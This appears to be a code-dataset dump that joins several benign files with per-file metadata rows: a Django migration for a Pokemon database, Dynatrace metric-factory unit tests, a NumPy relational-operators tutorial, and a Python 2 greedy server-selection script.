preserve_default=True,
),
migrations.AlterField(
model_name='encountermethodname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='evolutiontrigger',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='evolutiontriggername',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='gender',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='generation',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='generationname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='growthrate',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='item',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='itemattribute',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='itemattributename',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='itemcategory',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='itemcategoryname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='itemflingeffect',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='itemname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='itempocket',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='itempocketname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='language',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='languagename',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='location',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='locationarea',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='locationareaname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='locationname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='move',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='moveattribute',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='moveattributename',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='movebattlestyle',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='movebattlestylename',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='movedamageclass',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='movedamageclassname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='movelearnmethod',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='movelearnmethodname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='movemetaailment',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='movemetaailmentname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='movemetacategory',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='movename',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='movetarget',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='movetargetname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='nature',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='naturename',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='palparkarea',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='palparkareaname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='pokeathlonstat',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='pokeathlonstatname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='pokedex',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='pokedexname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='pokemon',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='pokemoncolor',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='pokemoncolorname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='pokemonform',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='pokemonformname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='pokemonhabitat',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='pokemonhabitatname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='pokemonshape',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='pokemonshapename',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='pokemonspecies',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='pokemonspeciesname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='region',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='regionname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='stat',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='statname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='type',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='typename',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='version',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='versiongroup',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='versionname',
name='name',
field=models.CharField(max_length=100, db_index=True),
preserve_default=True,
),
]
| 34.38755 | 77 | 0.556321 | 1,557 | 17,125 | 5.908157 | 0.069364 | 0.176106 | 0.220133 | 0.255354 | 0.868573 | 0.868573 | 0.868573 | 0.868573 | 0.868573 | 0.868573 | 0 | 0.021891 | 0.338453 | 17,125 | 497 | 78 | 34.45674 | 0.790096 | 0 | 0 | 0.821501 | 0 | 0 | 0.082861 | 0.007124 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.002028 | 0 | 0.008114 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
fd6767eb450fab99bb1f1dd8d0f1defd2cdad4f0 | 13,365 | py | Python | tests/test_dynatrace_metric_factory.py | dynatrace-oss/dynatrace-metric-utils-python | d59cd910c55fd0042e98e5a7e61dd23d4555f530 | [
"Apache-2.0"
] | null | null | null | tests/test_dynatrace_metric_factory.py | dynatrace-oss/dynatrace-metric-utils-python | d59cd910c55fd0042e98e5a7e61dd23d4555f530 | [
"Apache-2.0"
] | 1 | 2021-10-14T11:37:10.000Z | 2021-10-14T11:37:10.000Z | tests/test_dynatrace_metric_factory.py | dynatrace-oss/dynatrace-metric-utils-python | d59cd910c55fd0042e98e5a7e61dd23d4555f530 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Dynatrace LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
from unittest import TestCase
from dynatrace.metric.utils import DynatraceMetricsFactory, MetricError
class TestDynatraceMetricFactory(TestCase):
@classmethod
def setUpClass(cls) -> None:
cls.factory = DynatraceMetricsFactory()
cls.test_dims = {
"dim1": "val1",
"dim2": "val2",
}
# 01/01/2021 00:00:00
cls.test_timestamp = 1609455600000
# 01/01/1999 00:00:00
cls.invalid_timestamp = 915145200000
def test_create_int_gauge(self):
metric = self.factory.create_int_gauge("mymetric", 100)
self.assertEqual("mymetric", metric.get_metric_name())
self.assertIsNotNone(metric.get_dimensions())
self.assertFalse(metric.get_dimensions())
self.assertEqual("gauge,100", metric.get_value().serialize_value())
self.assertIsNone(metric.get_timestamp())
def test_create_int_gauge_dims(self):
metric = self.factory.create_int_gauge("mymetric", 100, self.test_dims)
self.assertEqual("mymetric", metric.get_metric_name())
self.assertEqual(self.test_dims, metric.get_dimensions())
self.assertEqual("gauge,100", metric.get_value().serialize_value())
self.assertIsNone(metric.get_timestamp())
def test_create_int_gauge_timestamp(self):
metric = self.factory.create_int_gauge(
"mymetric", 100, self.test_dims, self.test_timestamp)
self.assertEqual("mymetric", metric.get_metric_name())
self.assertEqual(self.test_dims, metric.get_dimensions())
self.assertEqual("gauge,100", metric.get_value().serialize_value())
self.assertEqual(str(self.test_timestamp), metric.get_timestamp())
def test_create_int_gauge_invalid_timestamp(self):
with self.assertRaises(MetricError):
self.factory.create_int_gauge(
"mymetric", 100, self.test_dims, self.invalid_timestamp
)
def test_create_float_gauge(self):
metric = self.factory.create_float_gauge("mymetric", 123.456)
self.assertEqual("mymetric", metric.get_metric_name())
self.assertFalse(metric.get_dimensions())
self.assertEqual("gauge,123.456", metric.get_value().serialize_value())
self.assertIsNone(metric.get_timestamp())
def test_create_float_gauge_dims(self):
metric = self.factory.create_float_gauge("mymetric", 123.456,
self.test_dims)
self.assertEqual("mymetric", metric.get_metric_name())
self.assertEqual(self.test_dims, metric.get_dimensions())
self.assertEqual("gauge,123.456", metric.get_value().serialize_value())
self.assertIsNone(metric.get_timestamp())
def test_create_float_gauge_timestamp(self):
metric = self.factory.create_float_gauge(
"mymetric", 123.456, self.test_dims, self.test_timestamp)
self.assertEqual("mymetric", metric.get_metric_name())
self.assertEqual(self.test_dims, metric.get_dimensions())
self.assertEqual("gauge,123.456", metric.get_value().serialize_value())
self.assertEqual(str(self.test_timestamp), metric.get_timestamp())
def test_create_float_gauge_invalid(self):
with self.assertRaises(MetricError):
self.factory.create_float_gauge("mymetric", math.nan)
with self.assertRaises(MetricError):
self.factory.create_float_gauge("mymetric", math.inf)
with self.assertRaises(MetricError):
self.factory.create_float_gauge("mymetric", -math.inf)
with self.assertRaises(MetricError):
self.factory.create_float_gauge(
"mymetric", 100, self.test_dims, self.invalid_timestamp
)
def test_create_int_counter_delta(self):
metric = self.factory.create_int_counter_delta("mymetric", 100)
self.assertEqual("mymetric", metric.get_metric_name())
self.assertIsNotNone(metric.get_dimensions())
self.assertFalse(metric.get_dimensions())
self.assertEqual("count,delta=100",
metric.get_value().serialize_value())
self.assertIsNone(metric.get_timestamp())
def test_create_int_counter_delta_dims(self):
metric = self.factory.create_int_counter_delta(
"mymetric", 100, self.test_dims)
self.assertEqual("mymetric", metric.get_metric_name())
self.assertEqual(self.test_dims, metric.get_dimensions())
self.assertEqual("count,delta=100",
metric.get_value().serialize_value())
self.assertIsNone(metric.get_timestamp())
def test_create_int_counter_delta_timestamp(self):
metric = self.factory.create_int_counter_delta(
"mymetric", 100, self.test_dims, self.test_timestamp)
self.assertEqual("mymetric", metric.get_metric_name())
self.assertEqual(self.test_dims, metric.get_dimensions())
self.assertEqual("count,delta=100",
metric.get_value().serialize_value())
self.assertEqual(str(self.test_timestamp), metric.get_timestamp())
def test_create_int_counter_delta_invalid_timestamp(self):
with self.assertRaises(MetricError):
self.factory.create_int_counter_delta(
"mymetric", 100, self.test_dims, self.invalid_timestamp
)
def test_create_float_counter_delta(self):
metric = self.factory.create_float_counter_delta("mymetric", 123.456)
self.assertEqual("mymetric", metric.get_metric_name())
self.assertIsNotNone(metric.get_dimensions())
self.assertFalse(metric.get_dimensions())
self.assertEqual("count,delta=123.456",
metric.get_value().serialize_value())
self.assertIsNone(metric.get_timestamp())
def test_create_float_counter_delta_dims(self):
metric = self.factory.create_float_counter_delta(
"mymetric", 123.456, self.test_dims)
self.assertEqual("mymetric", metric.get_metric_name())
self.assertEqual(self.test_dims, metric.get_dimensions())
self.assertEqual("count,delta=123.456",
metric.get_value().serialize_value())
self.assertIsNone(metric.get_timestamp())
def test_create_float_counter_delta_timestamp(self):
metric = self.factory.create_float_counter_delta(
"mymetric", 123.456, self.test_dims, self.test_timestamp)
self.assertEqual("mymetric", metric.get_metric_name())
self.assertEqual(self.test_dims, metric.get_dimensions())
self.assertEqual("count,delta=123.456",
metric.get_value().serialize_value())
self.assertEqual(str(self.test_timestamp), metric.get_timestamp())
def test_create_float_counter_delta_invalid(self):
with self.assertRaises(MetricError):
self.factory.create_float_counter_delta("mymetric", math.nan)
with self.assertRaises(MetricError):
self.factory.create_float_counter_delta("mymetric", math.inf)
with self.assertRaises(MetricError):
self.factory.create_float_counter_delta("mymetric", -math.inf)
with self.assertRaises(MetricError):
self.factory.create_float_counter_delta(
"mymetric", 123.456, self.test_dims, self.invalid_timestamp
)
def test_create_int_summary(self):
metric = self.factory.create_int_summary(
"mymetric", 2, 5, 13, 5
)
self.assertEqual("mymetric", metric.get_metric_name())
self.assertIsNotNone(metric.get_dimensions())
self.assertFalse(metric.get_dimensions())
self.assertEqual("gauge,min=2,max=5,sum=13,count=5",
metric.get_value().serialize_value())
self.assertIsNone(metric.get_timestamp())
def test_create_int_summary_dims(self):
metric = self.factory.create_int_summary(
"mymetric", 2, 5, 13, 5, self.test_dims
)
self.assertEqual("mymetric", metric.get_metric_name())
self.assertEqual(self.test_dims, metric.get_dimensions())
self.assertEqual("gauge,min=2,max=5,sum=13,count=5",
metric.get_value().serialize_value())
self.assertIsNone(metric.get_timestamp())
def test_create_int_summary_timestamp(self):
metric = self.factory.create_int_summary(
"mymetric", 2, 5, 13, 5, self.test_dims, self.test_timestamp
)
self.assertEqual("mymetric", metric.get_metric_name())
self.assertEqual(self.test_dims, metric.get_dimensions())
self.assertEqual("gauge,min=2,max=5,sum=13,count=5",
metric.get_value().serialize_value())
self.assertEqual(str(self.test_timestamp), metric.get_timestamp())
def test_create_int_summary_invalid_timestamp(self):
with self.assertRaises(MetricError):
self.factory.create_int_summary(
"mymetric", 2, 5, 13, 5, self.test_dims, self.invalid_timestamp
)
def test_create_int_summary_invalid(self):
with self.assertRaises(MetricError):
self.factory.create_int_summary(
"mymetric", 14, 5, 12, 4
)
with self.assertRaises(MetricError):
self.factory.create_int_summary(
"mymetric", 2, 5, 13, -1
)
def test_create_float_summary(self):
metric = self.factory.create_float_summary(
"mymetric", 2.3, 5.6, 13.4, 7
)
self.assertEqual("mymetric", metric.get_metric_name())
self.assertIsNotNone(metric.get_dimensions())
self.assertFalse(metric.get_dimensions())
self.assertEqual("gauge,min=2.3,max=5.6,sum=13.4,count=7",
metric.get_value().serialize_value())
self.assertIsNone(metric.get_timestamp())
def test_create_float_summary_dims(self):
metric = self.factory.create_float_summary(
"mymetric", 2.3, 5.6, 13.4, 7, self.test_dims
)
self.assertEqual("mymetric", metric.get_metric_name())
self.assertEqual(self.test_dims, metric.get_dimensions())
self.assertEqual("gauge,min=2.3,max=5.6,sum=13.4,count=7",
metric.get_value().serialize_value())
self.assertIsNone(metric.get_timestamp())
def test_create_float_summary_timestamp(self):
metric = self.factory.create_float_summary(
"mymetric", 2.3, 5.6, 13.4, 7, self.test_dims, self.test_timestamp
)
self.assertEqual("mymetric", metric.get_metric_name())
self.assertEqual(self.test_dims, metric.get_dimensions())
self.assertEqual("gauge,min=2.3,max=5.6,sum=13.4,count=7",
metric.get_value().serialize_value())
self.assertEqual(str(self.test_timestamp), metric.get_timestamp())
def test_create_float_summary_invalid_timestamp(self):
with self.assertRaises(MetricError):
self.factory.create_float_summary(
"mymetric", 2.3, 5.6, 13.4, 7, self.test_dims,
self.invalid_timestamp
)
def test_create_float_summary_invalid(self):
with self.assertRaises(MetricError):
self.factory.create_float_summary(
"mymetric", 14.3, 5.6, 12.3, 4
)
with self.assertRaises(MetricError):
self.factory.create_float_summary(
"mymetric", 2.3, 5.6, 13.4, -1
)
def test_create_float_summary_invalid_values(self):
values = [1.2, math.nan, math.inf, -math.inf]
for i in values:
for j in values:
for k in values:
if i == j == k == 1.2:
# skip the only valid version
continue
else:
with self.assertRaises(MetricError):
self.factory.create_float_summary(
"mymetric", i, j, k, 1
)
def test_create_metrics_with_empty_name(self):
with self.assertRaises(MetricError):
self.factory.create_int_gauge("", 100)
with self.assertRaises(MetricError):
self.factory.create_float_gauge("", 123.456)
with self.assertRaises(MetricError):
self.factory.create_int_counter_delta("", 100)
with self.assertRaises(MetricError):
self.factory.create_float_counter_delta("", 123.456)
with self.assertRaises(MetricError):
self.factory.create_int_summary("", 2, 5, 13, 4)
with self.assertRaises(MetricError):
self.factory.create_float_summary("", 2.2, 5.6, 13.4, 4)
| 43.963816 | 79 | 0.651253 | 1,570 | 13,365 | 5.302548 | 0.091083 | 0.083243 | 0.083724 | 0.063423 | 0.887327 | 0.885405 | 0.877117 | 0.867988 | 0.862222 | 0.850811 | 0 | 0.03366 | 0.237561 | 13,365 | 303 | 80 | 44.108911 | 0.783317 | 0.046914 | 0 | 0.559671 | 0 | 0.012346 | 0.064308 | 0.016509 | 0 | 0 | 0 | 0 | 0.411523 | 1 | 0.119342 | false | 0 | 0.012346 | 0 | 0.135802 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fdfe89776dded7c98c16c8732faf29eda5d45d08 | 5,427 | py | Python | Math/A01_Arithmetics_basics/Programs/S03/Relational_operators.py | Polirecyliente/SGConocimiento | 560b08984236d7a10f50c6b5e6fb28844193d81b | [
"CC-BY-4.0"
] | null | null | null | Math/A01_Arithmetics_basics/Programs/S03/Relational_operators.py | Polirecyliente/SGConocimiento | 560b08984236d7a10f50c6b5e6fb28844193d81b | [
"CC-BY-4.0"
] | null | null | null | Math/A01_Arithmetics_basics/Programs/S03/Relational_operators.py | Polirecyliente/SGConocimiento | 560b08984236d7a10f50c6b5e6fb28844193d81b | [
"CC-BY-4.0"
] | null | null | null | #T# relational operators are used to do relational operations, i.e. operations in which there is testing of the values of numbers, by comparing them against each other
#T# the equality == operator compares if two numbers are equal
a = 5; b = 3
bool1 = a == b # False
a = 4; b = 4
bool1 = a == b # True
#T# the not equal != operator compares if two number are not equal
a = 5; b = 3
bool1 = a != b # True
a = 4; b = 4
bool1 = a != b # False
#T# the greater than > operator compares if the first number is greater than the second
a = 5; b = 3
bool1 = a > b # True
a = 4; b = 4
bool1 = a > b # False
#T# the less than < operator compares if the first number is less than the second
a = 3; b = 5
bool1 = a < b # True
a = 4; b = 4
bool1 = a < b # False
#T# the greater than or equal to >= operator compares if the first number is greater than or equal to the second
a = 5; b = 3
bool1 = a >= b # True
a = 4; b = 4
bool1 = a >= b # True
a = 3; b = 5
bool1 = a >= b # False
#T# the less than or equal to <= operator compares if the first number is less than or equal to the second
a = 3; b = 5
bool1 = a <= b # True
a = 4; b = 4
bool1 = a <= b # True
a = 5; b = 3
bool1 = a <= b # False
#T# to do relational operations with lists or arrays element-wise, the numpy package is used
import numpy as np
#T# the array_equal function from the numpy package, compares if two arrays are equal, with the same shape and the same elements
arr1 = np.array([[6, 9, 4, 4], [8, 1, 9, 10]])
arr2 = np.array([[6, 9, 4, 4], [8, 1, 9, 10]])
bool1 = np.array_equal(arr1, arr2) # True
#T# the equal function from the numpy package, compares if two arrays are equal element-wise, it supports array broadcasting
arr1 = np.array([[6, 9, 4, 4], [8, 1, 10, 8]])
arr2 = np.array([7, 3, 4, 8])
arr3 = np.equal(arr1, arr2)
# array([[False, False, True, False], [False, False, False, True]])
#T# the equality operator == can be used to compare if two numpy arrays are equal element-wise, it supports array broadcasting
arr1 = np.array([[6, 9, 4, 4], [8, 1, 10, 8]])
arr2 = np.array([7, 3, 4, 8])
arr3 = arr1 == arr2
# array([[False, False, True, False], [False, False, False, True]])
#T# the not_equal function from the numpy package, compares if two arrays are not equal element-wise, it supports array broadcasting
arr1 = np.array([[6, 9, 4, 4], [8, 1, 10, 8]])
arr2 = np.array([7, 3, 4, 8])
arr3 = np.not_equal(arr1, arr2)
# array([[ True, True, False, True], [ True, True, True, False]])
#T# the not equal != operator can be used to compare if two numpy arrays are not equal element-wise, it supports array broadcasting
arr1 = np.array([[6, 9, 4, 4], [8, 1, 10, 8]])
arr2 = np.array([7, 3, 4, 8])
arr3 = arr1 != arr2
# array([[ True, True, False, True], [ True, True, True, False]])
#T# the greater function from the numpy package, compares if the first array is greater than the second element-wise, it supports array broadcasting
arr1 = np.array([[6, 9, 4, 4], [8, 1, 10, 8]])
arr2 = np.array([7, 3, 4, 8])
arr3 = np.greater(arr1, arr2)
# array([[False, True, False, False], [ True, False, True, False]])
#T# the greater than > operator can be used to compare if the first numpy array is greater than the second element-wise, it supports array broadcasting
arr1 = np.array([[6, 9, 4, 4], [8, 1, 10, 8]])
arr2 = np.array([7, 3, 4, 8])
arr3 = arr1 > arr2
# array([[False, True, False, False], [ True, False, True, False]])
#T# the less function from the numpy package, compares if the first array is less than the second element-wise, it supports array broadcasting
arr1 = np.array([[6, 9, 4, 4], [8, 1, 10, 8]])
arr2 = np.array([7, 3, 4, 8])
arr3 = np.less(arr1, arr2)
# array([[ True, False, False, True], [False, True, False, False]])
#T# the less than < operator can be used to compare if the first numpy array is less than the second element-wise, it supports array broadcasting
arr1 = np.array([[6, 9, 4, 4], [8, 1, 10, 8]])
arr2 = np.array([7, 3, 4, 8])
arr3 = arr1 < arr2
# array([[ True, False, False, True], [False, True, False, False]])
#T# the greater_equal function from the numpy package, compares if the first array is greater than or equal to the second element-wise, it supports array broadcasting
arr1 = np.array([[6, 9, 4, 4], [8, 1, 10, 8]])
arr2 = np.array([7, 3, 4, 8])
arr3 = np.greater_equal(arr1, arr2)
# array([[False, True, True, False], [ True, False, True, True]])
#T# the greater than or equal to >= operator can be used to compare if the first numpy array is greater than or equal to the second element-wise, it supports array broadcasting
arr1 = np.array([[6, 9, 4, 4], [8, 1, 10, 8]])
arr2 = np.array([7, 3, 4, 8])
arr3 = arr1 >= arr2
# array([[False, True, True, False], [ True, False, True, True]])
#T# the less_equal function from the numpy package, compares if the first array is less than or equal to the second element-wise, it supports array broadcasting
arr1 = np.array([[6, 9, 4, 4], [8, 1, 10, 8]])
arr2 = np.array([7, 3, 4, 8])
arr3 = np.less_equal(arr1, arr2)
# array([[ True, False, True, True], [False, True, False, True]])
#T# the less than or equal to <= operator can be used to compare if the first numpy array is less than or equal to the second element-wise, it supports array broadcasting
arr1 = np.array([[6, 9, 4, 4], [8, 1, 10, 8]])
arr2 = np.array([7, 3, 4, 8])
arr3 = arr1 <= arr2
# array([[ True, False, True, True], [False, True, False, True]]) | 44.85124 | 176 | 0.653952 | 987 | 5,427 | 3.587639 | 0.080041 | 0.071166 | 0.063259 | 0.035583 | 0.887885 | 0.871223 | 0.868116 | 0.867269 | 0.834228 | 0.803163 | 0 | 0.064851 | 0.201585 | 5,427 | 121 | 177 | 44.85124 | 0.752366 | 0.649899 | 0 | 0.764706 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.014706 | 0 | 0.014706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e3674e7b1debbefde6b3ca21d4210c20a99a8fdc | 114 | py | Python | examples/torch/common/models/__init__.py | MaximProshin/nncf | 2290d2f4cebcf6749e419dc76850e7bd8b7d8da1 | [
"Apache-2.0"
] | 310 | 2020-10-29T09:22:42.000Z | 2022-03-31T04:53:34.000Z | examples/torch/common/models/__init__.py | MaximProshin/nncf | 2290d2f4cebcf6749e419dc76850e7bd8b7d8da1 | [
"Apache-2.0"
] | 615 | 2020-10-28T10:22:25.000Z | 2022-03-29T18:09:23.000Z | examples/torch/common/models/__init__.py | MaximProshin/nncf | 2290d2f4cebcf6749e419dc76850e7bd8b7d8da1 | [
"Apache-2.0"
] | 86 | 2020-10-28T11:34:34.000Z | 2022-03-31T08:00:35.000Z | from examples.torch.common.models.segmentation import *
from examples.torch.common.models.classification import *
| 38 | 57 | 0.842105 | 14 | 114 | 6.857143 | 0.571429 | 0.25 | 0.354167 | 0.479167 | 0.604167 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.070175 | 114 | 2 | 58 | 57 | 0.90566 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
8b6d2b1169dfea534de7ae281fe9f466431a5892 | 3,077 | py | Python | greedy.py | backii/ES | c464f9d1d8f4846e711c986237e9cab45c2eb974 | [
"MIT"
] | null | null | null | greedy.py | backii/ES | c464f9d1d8f4846e711c986237e9cab45c2eb974 | [
"MIT"
] | null | null | null | greedy.py | backii/ES | c464f9d1d8f4846e711c986237e9cab45c2eb974 | [
"MIT"
] | null | null | null | """
Greedy algorithm
"""
def greedy_alg(counter, time, tab, MAX_COST, THRESHOLD):
items = [server.fit_results(time) for server in tab]
server_cost = 0
resource = 0
#Jesli bierzemy tylko pod uwage koszt to
if counter == "cost":
items.sort(key=lambda x: x[1])
print items
while resource < THRESHOLD and server_cost <= MAX_COST:
for i in range(len(items)):
if server_cost + items[i][1] <= MAX_COST:
if resource + items[i][0] <= THRESHOLD:
server_cost += items[i][1]
resource += items[i][0]
if i == len(items) -1:
if resource + items[0][0] >= THRESHOLD:
server_cost += items[0][1]
resource += items[0][0]
break
elif resource + items[i+1][0] >= THRESHOLD:
server_cost += items[i+1][1]
resource += items[i+1][0]
break
print server_cost
print resource
# Jesli bierzemy tylko pod uwage moc to
if counter == "power":
items.sort(key=lambda x: x[0])
items.reverse()
while resource < THRESHOLD and server_cost <= MAX_COST:
for i in range(len(items)):
if server_cost + items[i][1] <= MAX_COST:
if resource + items[i][0] <= THRESHOLD:
server_cost += items[i][1]
resource += items[i][0]
if i == len(items) - 1:
if resource + items[0][0] >= THRESHOLD:
server_cost += items[0][1]
resource += items[0][0]
break
elif resource + items[i + 1][0] >= THRESHOLD:
server_cost += items[i + 1][1]
resource += items[i + 1][0]
break
print server_cost
print resource
# Jesli bierzemy pod uwage tylko koszt przez zasoby koszt/zasoby
if counter == "divide":
items.sort(key=lambda x: x[1]/(x[0] + 0.0))
while resource < THRESHOLD and server_cost <= MAX_COST:
for i in range(len(items)):
if server_cost + items[i][1] <= MAX_COST:
if resource + items[i][0] <= THRESHOLD:
server_cost += items[i][1]
resource += items[i][0]
if i == len(items) - 1:
if resource + items[0][0] >= THRESHOLD:
server_cost += items[0][1]
resource += items[0][0]
break
elif resource + items[i + 1][0] >= THRESHOLD:
server_cost += items[i + 1][1]
resource += items[i + 1][0]
break
print server_cost
print resource
